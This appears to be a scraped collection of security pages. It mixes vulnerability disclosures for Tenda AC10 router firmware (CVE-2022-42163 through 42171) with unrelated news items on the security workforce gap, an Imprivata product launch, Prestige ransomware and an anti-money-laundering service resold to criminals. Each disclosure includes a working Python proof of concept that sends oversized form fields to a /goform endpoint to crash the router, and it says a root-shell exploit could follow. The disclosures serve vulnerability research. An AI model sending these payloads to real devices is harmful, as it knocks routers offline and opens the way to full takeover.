Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/addWifiMacFilter.

Permalink

Cannot retrieve contributors at this time

**Tenda AC10V15.03.06.23 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2734.html
    

**Affected version**

**Vulnerability details**

/goform/addWifiMacFilter, device\_mac, device\_id are controllable and will be copied to mib\_value by sprintf. It is worth noting that the size is not checked, resulting in a stack overflow vulnerability

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'device\_id=1&device\_mac=' + p1

p3 \= b"POST /goform/addWifiMacFilter" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-42169: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/formWifiWpsStart.

Permalink

Cannot retrieve contributors at this time

**Tenda AC10V15.03.06.23 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2734.html
    

**Affected version**

**Vulnerability details**

/goform/WifiWpsStart，The index and mode are controllable. If the conditions are met to sprintf, they will be spliced into tmp. It is worth noting that there is no size check,which leads to a stack overflow vulnerability.

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'mode=1&index=' + p1

p3 \= b"POST /goform/WifiWpsStart" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: curShow=; ac\_login\_info=passwork; test=A; password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-42170: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/saveParentControlInfo.

Permalink

Cannot retrieve contributors at this time

**Tenda AC10V15.03.06.23 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2734.html
    

**Affected version**

**Vulnerability details**

/goform/saveParentControlInfo, In saveParentControlInfo, deviceName and deviceId are controllable and will be passed into the set\_device\_name function. In the set\_device\_name function, dev\_name will be spliced into mib\_vlaue by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'deviceId=1&deviceName=' + p1

p3 \= b"POST /goform/saveParentControlInfo" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: curShow=; ac\_login\_info=passwork; test=A; password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-42171: IOT_Vul/readme.md at main · z1r00/IOT_Vul

A cross-disciplinary effort of change is needed to attract new professionals in the coming decade.

In 2010, the Center for Strategic and International Studies (CSIS) published the report "A Human Capital Crisis in Cybersecurity," which noted "there are about 1,000 security people in the US who have the specialized security skills to operate effectively in cyberspace. We need 10,000 to 30,000."

Twelve years later, the Cyberspace Solarium Commission 2.0 Workforce Development Agenda for the National Cyber Director observed that "in the United States, there are almost 600,000 open cybersecurity jobs across the private sector and federal, state, and local governments — a remarkable gap considering that the field currently employs just over a million professionals." This is not an encouraging trend.

**Stakeholders Who Have the Power**

To effect multigenerational change, there are four distinct groups of stakeholders that have the power to best address a problem that has existed for over a decade.

**Cybersecurity buyers** should generally stop buying point solutions and instead focus on a strategy of long-term consolidation of technical cybersecurity capabilities. Although the latest shift-left-zero-trust-artificial-intelligence-XDR-machine-learning "solution" may provide comprehensive coverage against the latest techniques from an advanced persistent threat, it's meaningless unless your organization has actual proof of engagement by an advanced persistent threat (APT) that uses those techniques. Each new point solution has a training and operations burden, typically a minimum of two people who must learn to design and operate the solution.

Unfortunately, each new solution also needs to be integrated into the organization's existing security stack, which takes precious time and resources, and where visibility failures may provide coverage for threat actors to hide. By comparison, an integrated security stack might not immediately cover every conceivable technology threat permutation, but it will take fewer human resources to own and operate, and those staff tasked with operations will have in-depth knowledge as a result.

**HR professionals** should de-emphasize the importance of certifications for interns and junior and midcareer professionals and instead focus on on-the-job training and clearly defined career paths for cybersecurity professionals. The issue with certifications has existed since before CSIS in 2010 observed, "It is the consensus of the Commission that the current professional certification regime is not merely inadequate; it creates a dangerously false sense of security." Part of the reason for the workforce gap is the sheer number of entry-level job postings that require certifications; the specificity of the job descriptions also has been repeatedly shown to discourage otherwise-qualified women and minorities from even applying.

Retaining cybersecurity professionals is similarly difficult, as many junior and midcareer professionals will change jobs every two to five years to gain expertise with new technologies and additional security domains. Both hiring and retention can be managed effectively with well-defined career paths for cybersecurity professionals, such as those defined by the National Institute of Standards and Technology's (NIST) National Initiative for Cybersecurity Education (NICE) program. When supplemented by paid training from employers, employees are more likely to stay, which further reduces the cybersecurity skills gap.

**Compliance professionals** should be aware that their security counterparts are continuously overextended and seek to automate as many compliance operations as feasible. When responding to an internal assessment or an external audit, compliance professionals regularly rely on the security team to collect evidence of internal control operation and effectiveness. Realistically, this is an "extra" job duty on the part of security professionals, and as such, these tasks may be done in a rush or put off to the last minute, due to the more pressing duties on their limited time. These activities include manual tasks such as taking a screenshot of the password policy and saving it in a defined location or creating a PDF report showing that all hard drives are encrypted. As these compliance activities do not require creativity or intuition, they are prime opportunities for automation, which will lessen the time burden on security professionals. This may also result in a positive change in budgetary priorities, as an organization that has automated many compliance operations can hire additional security staff rather than additional compliance staff.

**Individual cybersecurity professionals** should reach out to middle schools and high schools to find opportunities to speak to young people about their jobs. A persistent misconception in secondary education is that cybersecurity jobs require a programming background, yet most cybersecurity jobs require no expertise in programming. Individual contributors across all disciplines — including sales, marketing, UX design, customer success, DFIR, and red teamers — should try to speak to one secondary school audience about what they do, why they love their job, and how their job has a middle-class salary that likely only required a two-year degree. That last part will resonate with many secondary school students and their parents who are considering how long it may take to pay off a four-year university degree.

Despite there not being a single solution to solving the cybersecurity workforce gap, there are reasons to be hopeful. The cybersecurity community attracts people who like working in teams and sharing their knowledge and experiences. A cross-disciplinary effort of behavioral changes across stakeholders based on shared values may be our best solution moving forward for the next decade.

4 Stakeholders Critical to Addressing the Cybersecurity Workforce Gap

Offers solution to accelerate identity intelligence through simplified, yet extensive, visibility of user activity.

**WALTHAM, Mass., Oct. 17, 2022 (GLOBE NEWSWIRE)** — Imprivata, the digital identity company for mission- and life-critical industries, today announced the expansion of its integrated digital identity platform to defragment identities across a broad set of clinical and enterprise applications, with full visibility into individual user access activity. This integration leverages Imprivata OneSign, the company’s single sign-on solution, as the identity source for Imprivata FairWarning, its risk analytics and intelligence offering, to uniquely provide the necessary view of users across the entire application ecosystem to ensure compliance and reduce security risks.  

Healthcare organizations must understand quickly and easily who is accessing protected health information (PHI) to accurately detect, investigate, and prevent major issues before they happen. However, an alarming 51% of organizations don’t monitor access to critical systems and data. For most, it is difficult to understand anomalous behavior across the network as user IDs are not consistent across applications. As a result, it can be extremely challenging to remain compliant with HIPAA and other regulations while preventing hacks and data breaches.

“Today’s security, compliance, and privacy professionals are facing unprecedented complexities that create barriers to delivering efficient and seamless access to technology resources needed for optimum patient care delivery,” said Mark McArdle, Chief Products and Design Officer at Imprivata. “Solving complex digital identity challenges is our key priority, so we’re proud to extend our platform of capabilities to make their jobs easier and their organizations more secure.”

Available immediately, this integration enables healthcare organizations to:

*   **View enforced policy violations across the ecosystem** to identify high-risk users at-a- glance
*   **Increase match rates and accelerate user risk scoring via artificial intelligence (AI)** to understand and assess risk based on cross-application activity
*   **Simplify management of user lists in one place** to replace manual management of user lists in each EHR or data source
*   **Automate processes** for updating user information as they move into new roles or departments

Imprivata FairWarning and Imprivata OneSign contribute broadly to the Imprivata Digital Identity Framework (DIF), a guide to enabling, controlling, and monitoring identities across highly complex ecosystems.

For more information, visit www.imprivata.com.

**About Imprivata**   
Imprivata is the digital identity company for mission- and life-critical industries, redefining how organizations solve complex workflow, security, and compliance challenges with solutions that protect critical data and applications without workflow disruption. Its platform of interoperable identity, authentication, and access management solutions enable organizations in over 45 countries to fully manage and secure all enterprise and third-party digital identities by establishing trust between people, technology, and information.

Imprivata Expands Its Integrated Digital Identity Platform to Defragment Identities Across Disparate Applications

Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/fromNatStaticSetting.

Permalink

**Tenda AC10V15.03.06.23 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2734.html
    

**Affected version**

**Vulnerability details**

/goform/NatStaticSetting, It can be seen that the page is controlled by the user, and will be spliced into the gotopage with sprintf. It is worth noting that there is no size limit to cause stack overflow.

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x300
p2 \= b'page=' + p1

p3 \= b"POST /goform/NatStaticSetting" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: curShow=; ac\_login\_info=passwork; test=A; password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-42163: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/formSetDeviceName.

Permalink

Cannot retrieve contributors at this time

**Tenda AC10V15.03.06.23 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2734.html
    

**Affected version**

**Vulnerability details**

/goform/SetDeviceName, Called set\_device\_name in formSetDeviceName, dev\_name, dev\_id are both controllable

In set\_device\_name, dev\_name will be spliced into sprintf, it is worth noting that the size is not checked, resulting in a stack overflow vulnerability

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x300
p2 \= b'dev\_id=1&devName=' + p1

p3 \= b"POST /goform/SetDeviceName" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111; curShow=; ac\_login\_info=passwork; test=A" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-42165: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/formSetClientState.

Permalink

**Tenda AC10V15.03.06.23 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2734.html
    

**Affected version**

**Vulnerability details**

/goform/SetClientState， The two variables ul\_speed and dl\_speed are user-controllable and will be spliced into the buff by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x300
p2 \= b'limitEn=1&deviceId=a&limitSpeedUp=a&limitSpeed=' + p1

p3 \= b"POST /goform/SetClientState" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-42164: IOT_Vul/readme.md at main · z1r00/IOT_Vul

A new ransomware campaign targeted the transportation and logistics sectors in Ukraine and Poland on October 11 with a previously unknown payload dubbed Prestige.
"The activity shares victimology with recent Russian state-aligned activity, specifically on affected geographies and countries, and overlaps with previous victims of the FoxBlade malware (also known as HermeticWiper)," the Microsoft

A new ransomware campaign targeted the transportation and logistics sectors in Ukraine and Poland on October 11 with a previously unknown payload dubbed **Prestige**.

"The activity shares victimology with recent Russian state-aligned activity, specifically on affected geographies and countries, and overlaps with previous victims of the FoxBlade malware (also known as HermeticWiper)," the Microsoft Threat Intelligence Center (MSTIC) said.

The tech giant remarked the intrusions occurred within an hour of each other across all victims, attributing the infections to an unnamed cluster called DEV-0960. It did not disclose the scale of the attacks, but stated it's notifying all affected customers.

The campaign is also believed to be distinct from other recent destructive attacks that have involved the use of HermeticWiper and CaddyWiper, the latter of which is launched by a malware loader called ArguePatch (aka AprilAxe).

The method of initial access remains unknown, with Microsoft noting that the threat actor had already obtained privileged access to the compromised environment to deploy the ransomware using three different methods.

In a related development, Fortinet FortiGuard Labs took the wraps off a multi-stage attack chain that leverages a weaponized Microsoft Excel document, which masquerades as a spreadsheet for generating salaries for Ukrainian military personnel to drop Cobalt Strike Beacon.

"The threat landscape in Ukraine continues to evolve, and wipers and destructive attacks have been a consistent theme," Redmond noted. "Ransomware and wiper attacks rely on many of the same security weaknesses to succeed."

The findings come amid an explosion of relatively new ransomware strains that have been gaining traction on the threat landscape, including that of Bisamware, Chile Locker, Royal, and Ransom Cartel, over the past few months.

Ransom Cartel, which surfaced in mid-December 2021, is also notable for sharing technical overlaps with REvil ransomware, which shut shop in October 2021 following immense law enforcement scrutiny into its operations after a string of high-profile attacks on JBS and Kaseya.

It's suspected that "Ransom Cartel operators had access to earlier versions of REvil ransomware source code," Palo Alto Networks Unit 42 observed on October 14, stating that "there was a relationship between the groups at some point, though it may not have been recent."

REvil, earlier this January, suffered further setback when Russian authorities arrested multiple members, but there are indications that the notorious cybercrime cartel may have staged a return in some form.

Cybersecurity firm Trellix, in late September, also revealed how a "disgruntled internal source" from the group shared details about the adversary's Tactics, Techniques and Procedures (TTPs), lending a crucial insight into the "relationships and inner workings of REvil and its members."

It's not just REvil that's back on the ransomware radar. HP Wolf Security last week said it isolated a Magniber campaign that has been found targeting Windows home users with fake security updates which employ a JavaScript file to proliferate the file-encrypting malware.

"The attackers used clever techniques to evade protection and detection mechanisms," malware analyst Patrick Schläpfer pointed out. "Most of the infection chain is 'fileless,' meaning the malware only resides in memory, reducing the chances of it being detected."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

New Prestige Ransomware Targeting Polish and Ukrainian Organizations

AMLBot, a service that helps businesses avoid transacting with cryptocurrency wallets that have been sanctioned for cybercrime activity, said an investigation published by KrebsOnSecurity last year helped it shut down three dark web services that secretly resold its technology to help cybercrooks avoid detection by anti-money laundering systems.

**AMLBot**, a service that helps businesses avoid transacting with cryptocurrency wallets that have been sanctioned for cybercrime activity, said an investigation published by KrebsOnSecurity last year helped it shut down three dark web services that secretly resold its technology to help cybercrooks avoid detection by anti-money laundering systems.

Antinalysis, as it existed in 2021.

In August 2021, KrebsOnSecurity published “New Anti Anti-Money Laundering Services for Crooks,” which examined **Antinalysis**, a service marketed on cybercrime forums that purported to offer a glimpse of how one’s payment activity might be flagged by law enforcement agencies and private companies that track and trace cryptocurrency transactions.

“Worried about dirty funds in your BTC address? Come check out Antinalysis, the new address risk analyzer,” read the service’s opening announcement. “This service is dedicated to individuals that have the need to possess complete privacy on the blockchain, offering a perspective from the opponent’s point of view in order for the user to comprehend the possibility of his/her funds getting flagged down under autocratic illegal charges.”

Antinalysis allows free lookups, but anyone wishing to conduct bulk look-ups has to pay at least USD $3, with a minimum $30 purchase. Other plans go for as high as $6,000 for 5,000 requests. **Nick Bax**, a security researcher who specializes in tracing cryptocurrency transactions, told KrebsOnSecurity at the time that Antinalysis was likely a clone of AMLBot because the two services generated near-identical results.

AMLBot shut down Antinalysis’s access just hours after last year’s story went live. However, Antinalysis\[.\]org remains online and accepting requests, as does the service’s Tor-based domain, and it is unclear how those services are sourcing their information.

AMLBot spokesperson **Polina Smoliar** said the company undertook a thorough review after that discovery, and in the process found two other services similar to Antinalysis that were reselling their application programming interface (API) access to cybercrooks.

Smoliar said that following the revelations about Antinalysis, AMLBot audited its entire client base, and implemented the ability to provide APIs only after a contract is signed and the client has been fully audited. AMLBot said it also instituted 24/7 monitoring of all client transactions.

“As a result of these actions, two more services with the name AML (the same as AMLBot has) were found to be involved in fraudulent schemes,” Smoliar said. “Information about the fraudsters was also sent to key market participants, and their transaction data was added to the tracking database to better combat money laundering.”

Experts say the founder of Antinalysis also runs a darknet market for narcotics.

The Antinalysis homepage and chatter on the cybercrime forums indicates the service was created by a group of coders known as the **Incognito Team**. **Tom Robinson**, co-founder of the blockchain intelligence firm Elliptic, said the creator of Antinalysis is also one of the developers of Incognito Market, a darknet marketplace specializing in the sale of narcotics.

“Incognito was launched in late 2020, and accepts payments in both Bitcoin and Monero, a cryptoasset offering heightened anonymity,” Robinson said. “The launch of Antinalysis likely reflects the difficulties faced by the market and its vendors in cashing out their Bitcoin proceeds.”

Tag

#intel